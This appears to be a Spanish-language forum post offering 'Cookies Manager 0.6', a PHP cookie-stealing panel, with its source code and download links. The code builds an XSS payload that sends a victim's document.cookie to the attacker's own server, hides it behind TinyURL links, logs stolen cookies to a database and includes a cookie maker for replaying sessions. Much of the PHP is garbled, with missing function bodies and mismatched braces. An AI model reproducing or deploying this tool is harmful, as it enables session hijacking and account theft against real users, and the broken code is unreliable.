Tiene las siguientes opciones :
- Cookie Stealer con generador de TinyURL
- Pueden ver los cookies que les devuelve una pagina
- Pueden crear cookies con los datos que quieran
- Panel oculto con login para entrar usen ?poraca para encontrar al login
Una imagen :
Los codigos :
index.php
Código
<?php // Cookies Manager 0.6 // (C) Doddy Hackman 2015 // Login $username = "admin"; // Edit $password = "21232f297a57a5a743894a0e4a801fc3"; // Edit // $index = "imagen.php"; // Edit echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Login</title> <link rel="shortcut icon" href="images/icono.png"> <link href="style.css" rel="stylesheet" type="text/css" /> </head> <body> <center><br> <div class="post"> <h3>Login</h3> <div class="post_body"> <img src="images/login.jpg" width="562" height="440" /> <br /> <form action="" method=POST> Username : <input type=text size=30 name=username /><br /><br /> Password : <input type=password size=30 name=password /><br /><br /> <input type=submit name=login style="width: 100px;" value=Login /><br /><br /> </form> </div> </div> </center> </body> </html>'; $test_username = $_POST['username']; if ($test_username == $username && $test_password == $password) { echo "<script>alert('Welcome idiot');</script>"; } else { echo "<script>alert('Fuck You');</script>"; } } } else { echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />'; } // The End ? ?>
imagen.php
Código
<?php // Cookies Manager 0.6 // (C) Doddy Hackman 2015 // Login $username = "admin"; // Edit $password = "21232f297a57a5a743894a0e4a801fc3"; // Edit // DB $host = "localhost"; // Edit $userw = "root"; // Edit $passw = ""; // Edit $db = "cookies"; // Edit // Functions function hex_encode($text) { } function parsear_cookie($leyendo) { $nombre = ""; $valor_cookie = ""; $expires = ""; $path = ""; $domain = ""; $secure = "false"; $httponly = "false"; foreach ($contenido as $valor) { $expires = $regex[1]; } $path = $regex[1]; $domain = $regex[1]; $secure = $regex[1]; $httponly = $regex[1]; } else { $nombre = $regex[1]; $valor_cookie = $regex[2]; } } } $nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly ); } function ver_cookies_de_pagina($pagina) { $cookies = ""; 'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' ) ); foreach ($http_response_header as $valores) { } } } else { curl_setopt($nave, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"); foreach ($leyendo as $valores) { } } } return $cookies; } function toma($target) { $code = ""; curl_setopt($nave, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'); } else { 'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' ) ); } return $code; } // error(); } if ($ip == "::1") { $ip = "127.0.0.1"; } mysql_query("INSERT INTO cookies_found(id,fecha,ip,info,cookie) values(NULL,'$dia','$ip','$info','$cookie')"); } $user = $plit[0]; $pass = $plit[1]; if ($user == $username and $pass == $password) { echo ' <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Cookies Manager 0.6</title> <link href="style.css" rel="stylesheet" type="text/css" /> <link rel="shortcut icon" href="images/icono.png"> </head> <body> <center>'; echo '<br><img src="images/cookies.png" /><br>'; echo "<script>alert('Cookie maked');</script>"; } else { echo "<script>alert('Error making Cookie');</script>"; } } $edit_name = ""; $edit_value = ""; $edit_expire = ""; $edit_path = ""; $edit_domain = ""; $edit_secure = ""; $edit_httponline = ""; $cookies_found = "create table cookies_found ( id int(10) UNSIGNED NOT NULL AUTO_INCREMENT, fecha TEXT NOT NULL, ip TEXT NOT NULL, info TEXT NOT NULL, cookie TEXT NOT NULL, PRIMARY KEY (id)); "; echo "<script>alert('Installed');</script>"; } else { echo "<script>alert('Error');</script>"; } } // echo "<script>alert('Cookie deleted');</script>"; } else { echo "<script>alert('Error');</script>"; } } } // Cookies Found echo ' <div class="post"> <h3>Cookies Found : ' . $con . '</h3> <div class="post_body"><br>'; if ($con <= 0) { echo '<b>No cookies found</b><br>'; } else { echo '<table>'; echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>"; $cookies_view = $ver[4]; list($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($cookies_view); echo "<td>" . htmlentities($ver[0]) . "</td><td>" . htmlentities($ver[1]) . "</td><td>" . htmlentities($ver[2]) . "</td><td>" . htmlentities($ver[3]) . "</td>"; echo "<td>" . htmlentities($cookies_view) . "</td><td>" . htmlentities($nombre) . "</td><td>" . htmlentities($valor_cookie) . "</td><td><a href=?del=" . htmlentities($ver[0]) . ">Delete</a></td><tr>"; } echo "</table>"; } echo ' <br></div> </div>'; // // Form para target echo ' <div class="post"> <h3>Enter Target</h3> <div class="post_body"><br>'; echo " <form action='' method=POST> <b>Link : </b><input type=text size=40 name=target value='http://localhost/dhlabs/xss/index.php?msg='=></td><tr> <input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'> <input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td> </form> "; echo ' <br></div> </div>'; // URLS echo ' <div class="post"> <h3>Console</h3> <div class="post_body"><br>'; echo "<textarea cols=50 name=code readonly>\n"; $script = hex_encode("<script>document.location='http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?id='+document.cookie;</script>"); //echo "http://tinyurl.com/api-create.php?url=".$_POST['target'].$script."\n"; $resultado_code = toma("http://tinyurl.com/api-create.php?url=" . $_POST['target'] . $script); echo "\n</textarea></table>"; echo ' <br><br></div> </div>'; } // // Get Cookies echo ' <div class="post"> <h3>Console</h3> <div class="post_body"><br>'; echo "<textarea cols=50 rows=10 name=code readonly>\n"; $resultado_code = ver_cookies_de_pagina($_POST['target']); echo "\n</textarea>"; echo ' <br><br></div> </div>'; list($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($leyendo_esto[0]); $edit_name = $nombre; $edit_value = $valor_cookie; $edit_expire = $expires; $edit_path = $path; $edit_domain = $domain; $edit_secure = $secure; $edit_httponline = $httponly; } // // Form para crear cookies echo ' <div class="post"> <h3>Cookie Maker</h3> <div class="post_body"><br>'; echo " <form action='' method=POST> <b>Name : </b><input type=text size=50 name=name_cookie value='$edit_name'><br><br> <b>Value : </b><input type=text size=50 name=value_cookie value='$edit_value'><br><br> <b>Expires : </b><input type=text size=50 name=expire_cookie value='$edit_expire'><br><br> <b>Path : </b><input type=text size=50 name=path_cookie value='$edit_path'><br><br> <b>Domain : </b><input type=text size=50 name=domain_cookie value='$edit_domain'><br><br> <b>Secure : </b><input type=text size=50 name=secure_cookie value='$edit_secure'><br><br> <b>HTTP Online : </b><input type=text size=50 name=httponline_cookie value='$edit_httponline'><br><br> <input type=submit name=makecookies style='height: 25px; width: 200px' value='Make Cookie'> </form>"; echo ' <br></div> </div>'; } else { echo ' <div class="post"> <h3>Installer</h3> <div class="post_body">'; echo " <form action='' method=POST> <h2>Do you want install Cookies Manager ?</h2><br> <input type=submit name=instalar value=Install> </form><br>"; echo ' </div> </div>'; } echo ' <br><h3>(C) Doddy Hackman 2015</h3><br> </center> </body> </html>'; } else { echo "<script>alert('Fuck You');</script>"; } } else { echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />'; } // The End ? ?>
style.css
Código
/* ==-----------------------------------== || Name : DH Theme || || Version : 0.8 || || Author : Doddy H || || Description: Templante || || Date : 14/1/2015 || ==-----------------------------------== */ body { background:transparent url("images/fondo.jpg") repeat scroll 0 0; color:gray; font-family:helvetica,arial,sans-serif; font-size:14px; text-align:center; } a:link { text-decoration:none; color:orange; } a:visited { color:orange; } a:hover { color:orange; } td,tr { border-style:solid; border-color: gray; border-width: 1px; background: black; border: solid #222 2px; color:gray; font-family:helvetica,arial,sans-serif; font-size:14px; text-align:center; } textarea { font: normal 10px Verdana, Arial, Helvetica,sans-serif; background-color:black; color:gray; border: solid #222 2px; border-color:gray } input { border-style:solid; border-color: gray; border-width: 1px; background: black; border: solid #222 2px; color:gray; font-family:helvetica,arial,sans-serif; font-size:14px; } .post { background-color:black; color:gray; margin-bottom:10px; width:600px; word-wrap: break-word; } .post h3 { background-color:black; color:orange; background-color:#000; border: solid #222 2px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; padding:5px 10px; } .post_body { background-color:black; margin:-20px 0 0 0; color:white; background-color:#000; border: solid #222 2px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; padding:5px 10px; } /* The End ? */
Un video con ejemplo de usos :
Si quieren bajar el programa lo pueden hacer de aca :
SourceForge.
Github.